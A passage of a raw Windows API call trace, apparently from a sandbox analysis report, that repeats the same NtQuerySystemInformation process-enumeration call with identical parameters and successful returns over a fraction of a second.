ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.588] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.589] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.590] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.592] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.639] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.639] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.640] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.640] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.641] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.641] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.642] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.642] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.642] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.643] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.643] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.644] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.644] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.644] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.645] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.645] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.646] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.646] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.646] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.647] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.647] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.648] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.649] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.650] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.652] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.653] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.654] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.655] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.657] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.658] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.660] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.661] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.662] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.663] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.664] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.666] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.692] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.693] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.694] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.694] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.695] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.695] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.696] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.696] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.696] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.697] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.697] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.698] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.698] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.698] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.699] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.703] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.707] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.708] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.708] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.709] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.709] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.710] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.710] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.710] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.711] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.711] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.712] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.712] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.713] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.713] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.714] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.722] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.722] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.723] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.723] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.724] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.724] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.725] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.725] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.725] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.726] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.728] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.729] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.730] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.731] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.733] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.741] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.744] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.745] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.745] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.746] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.746] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.746] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.747] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.747] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.748] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.749] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.750] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.752] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.753] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.754] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.755] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.764] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.764] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.765] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.765] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.766] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.766] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.767] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.767] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.767] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.769] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.770] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.771] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.772] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.774] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.775] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.788] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.789] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.789] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.790] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.790] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.790] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.791] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.791] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.792] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.792] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.792] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.793] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.793] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.794] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xd890) returned 0x0 [0066.794] NtQuerySystemInformation (in: SystemInformationClass=0x5, 